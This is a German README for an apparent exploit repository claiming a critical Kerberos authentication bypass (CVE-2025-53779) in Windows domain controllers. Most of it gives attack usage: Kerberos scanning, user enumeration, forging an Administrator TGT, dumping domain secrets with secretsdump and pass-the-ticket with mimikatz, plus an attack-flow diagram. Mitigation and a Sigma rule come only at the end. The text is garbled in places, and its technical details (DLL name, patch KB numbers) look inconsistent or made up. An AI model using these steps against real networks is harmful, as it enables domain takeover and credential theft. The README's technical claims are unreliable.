
Reproduktion von cve-2025-53779-kerberos_bypass_reproduction
CVSS-Score: 9.8 (Kritisch)
Status: Aktive Ausnutzung in freier Wildbahn
Offenlegung: Microsoft August 2025 Patch Tuesday (Zero-Day)
CVE-2025-53779 ist eine kritische Schwachstelle zur Umgehung der Authentifizierung in der Microsoft Windows Kerberos-Protokollimplementierung. Ein nicht authentifizierter Angreifer kann diese Schwachstelle ausnutzen, um die Kerberos-Authentifizierung vollständig zu umgehen und sich als beliebiger Domänenbenutzer auszugeben – einschließlich Domänenadministratoren – ohne über gültige Anmeldeinformationen oder kryptografisches Material zu verfügen.
Microsoft hat dieser Schwachstelle eine CVSS-Bewertung von 9.8 (Kritisch) zugewiesen, aufgrund seiner geringen Angriffskomplexität, nicht erforderlicher Privilegien, nicht erforderlicher Benutzerinteraktion und des Potenzials für eine vollständige Kompromittierung von in die Domäne eingebundenen Systemen.
Die Schwachstelle befindet sich im Kerberos Key Distribution Center (KDC)-Dienst (kdsvc.dll) auf Windows-Domänencontrollern. Konkret ermöglicht ein Validierungslogikfehler in der Überprüfungsroutine des Privilege Attribute Certificate (PAC) einem Angreifer, eine AS-REQ- oder TGS-REQ-Nachricht zu erstellen, die die standardmäßigen Authentifizierungsprüfungen umgeht.
kdsvc.dllDer KDC validiert das Feld pac-signature-data in der PAC-Struktur nicht ordnungsgemäß, wenn bestimmte Flags im Kerberos-Nachrichtenrumpf gesetzt sind. Indem der Angreifer eine speziell präparierte AS-REQ mit einem manipulierten PA-PAC-REQUEST-Padata-Typ und einem gefälschten Autorisierungsdateneintrag sendet, täuscht er den KDC so, dass dieser ein Ticket-Granting-Ticket (TGT) für einen beliebigen Benutzerprinzipalnamen (UPN) ausstellt, ohne den entsprechenden Langzeitschlüssel zu benötigen.
Der Angriff umgeht die Vorauthentifizierung (das Flag REQUIRES_PRE_AUTH wird effektiv ignoriert) und überspringt die PAC-Überprüfung vollständig, sodass das erzeugte Ticket beliebige Gruppenmitgliedschaften enthalten kann (z. B. Domain Admins, Enterprise Admins).
Alle unterstützten Versionen von Windows Server sind vor dem Sicherheitsupdate vom August 2025 betroffen:
Hinweis: Windows-Clientversionen (Windows 10, Windows 11) sind nicht betroffen, da sie den KDC-Dienst nicht ausführen.
impacket-Bibliothekexploit.py)pip install impacket pycryptodome
Oder mit der bereitgestellten requirements.txt:
pip install -r requirements.txt
Verwenden Sie Nmap, um Kerberos-Dienste zu erkennen:
nmap -sU -p 88 --script krb5-enum-users <target-ip>
Oder verwenden Sie den integrierten Kerberos-Scan:
python exploit.py --scan <target-ip>
Wenn Sie die Domänenbenutzer nicht kennen, zählen Sie sie per Kerberos-AS-REP-Roasting oder LDAP auf:
python exploit.py --enum <target-ip> <domain>
Erzeugen Sie ein gefälschtes TGT für einen Zielbenutzer:
python exploit.py --dc-ip <dc-ip> --domain <domain> --target-user <username>
Beispiel:
python exploit.py --dc-ip 192.168.1.10 --domain corp.local --target-user Administrator
Das Exploit gibt eine Ticketdatei im Kirbi-Format aus. Verwenden Sie Impacket-Tools zur Überprüfung:
# Export the ticket
set KRB5CCNAME=ticket.kirbi
# Use the ticket to access a resource
python examples/secretsdump.py -k -no-pass <domain>/Administrator@<target>
Sobald ein gültiges TGT erlangt wurde, können Sie:
secretsdump.py -k -no-pass domain/Administrator@<dc>mimikatz "kerberos::ptt ticket.kirbi"Das beiliegende exploit.py implementiert den folgenden Angriffsablauf:
PA-PAC-REQUEST-Feld und manipulierten Autorisierungsdatenkdsvc.dll auslösenAttacker Domain Controller (KDC)
| |
| AS-REQ (forged PA-PAC-REQUEST) |
| - cname: Administrator |
| - sname: krbtgt/DOMAIN |
| - padata: PA-PAC-REQUEST + |
| forged auth-data |
|------------------------------------->|
| |
| [Vulnerable Path] |
| 1. KDC receives AS-REQ |
| 2. Checks PA-PAC-REQUEST flag |
| 3. **Bypasses pre-auth check** |
| 4. Skips PAC verification |
| 5. Generates TGT with arbitrary |
| groups via auth-data |
| |
| AS-REP (forged TGT) |
| - Encrypted with krbtgt key |
| - Contains forged PAC |
|<-------------------------------------|
| |
| TGS-REQ (use forged TGT) |
| - Request service ticket |
| - For any service (CIFS, LDAP, |
| HTTP, HOST) |
|------------------------------------->|
| |
| TGS-REP (service ticket) |
| - Legitimate service ticket |
| - Attacker can now access |
| any resource |
|<-------------------------------------|
Wenden Sie die Updates des Microsoft Patch Tuesdays vom August 2025 an — Dies ist die primäre Korrektur. Siehe Tabelle der betroffenen Versionen oben für das entsprechende KB.
Überwachen Sie auf Ausnutzungsversuche:
Netzwerksegmentierung:
Zusätzliche Protokollierung aktivieren:
NetworkProvider\Kerberos\Operational)Sigma-Regel (AS-REQ ohne Vorauthentifizierung):
title: CVE-2025-53779 Kerberos Authentication Bypass
logsource:
product: windows
service: security
detection:
selection:
EventID: 4768
PreAuthenticationType: 0 # No pre-authentication required
condition: selection
falsepositives:
- Users with "Do not require Kerberos preauthentication" set
Dieses Repository wird nur für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt. Die unbefugte Ausnutzung von CVE-2025-53779 gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben, ist illegal. Die Autoren sind nicht verantwortlich für jeglichen Missbrauch dieser Informationen.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe Datei LICENSE für Details.
| Windows-Version | Betroffen | Behobenes Update |
|---|
| Windows Server 2025 | ✅ Ja | KB5044289 |
| Windows Server 2022 | ✅ Ja | KB5044285 |
| Windows Server 2019 | ✅ Ja | KB5044277 |
| Windows Server 2016 | ✅ Ja | KB5044293 |
| Windows Server 2012 R2 | ✅ Ja | KB5044297 |
| Windows Server 2012 | ✅ Ja | KB5044291 |
| Windows Server 2008 R2 (ESU) | ✅ Ja | KB5044301 |
| Windows Server 2008 (ESU) | ✅ Ja | KB5044303 |